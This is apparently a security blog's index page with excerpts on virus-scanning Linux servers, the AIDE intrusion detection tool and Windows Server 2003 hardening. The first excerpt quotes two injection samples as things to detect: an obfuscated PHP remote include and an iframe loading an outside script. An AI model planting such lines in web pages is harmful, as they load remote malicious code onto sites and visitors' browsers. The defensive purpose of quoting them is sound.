Security

How to do virus scan on Linux servers ?

Tags: LinuxSecurityvirus

Published on : April 21, 2009 by

How to do virus scan on Linux servers ?

Do you really need to do virus scan to ensure Linux server security ? Sometimes yes. With the recent high level of iframe/php include/js injections, it seems we need to scan the pages for iframe injections, like below < ? php include(urldecode("%68%74%74%70%3a%2f%2f%62%75%79%34%6d%65%2e%69%6e%66%6f%2f%73%63%72%2f%31%30%2e%74%78%74")); ? > < iframe src=http://ms.nesseseni.cn/src.js >< /iframe > Below are a few URLs […]

Continue Reading...


AIDE to aid your server security needs

Tags: AIDEHowtosLinuxSecurity

Published on : April 19, 2009 by

AIDE to aid your server security needs

An Intrusion detection system (or IDS) is a software or hardware designed to detect unwanted attempts at accessing, manipulating, and/or disabling of computer systems through a network.AIDE is useful in server security services. Some of the best IDS applications know are Snort, Untangle, Tripwire, AIDE etc. Among the simplest to configure and use is AIDE. […]

Continue Reading...


Initial Hardening or Securing and performance tweaking of a Windows Server 2003 – Part I

Tags: SecurityWindows

Published on : April 18, 2009 by

Initial Hardening or Securing and performance tweaking of a Windows Server 2003 – Part I

I am hereby mentioning a brief how-to on windows server hardening. 90% of the sages at SupportSages are Unix fanatics and I am a rebel belonging to the rest of 10% 🙂 But often we get requests on Windows Server hardening and hence I am hereby briefing the basic steps we should take to secure […]

Continue Reading...


Let's Connect

Get new updates

Categories

$0.000 items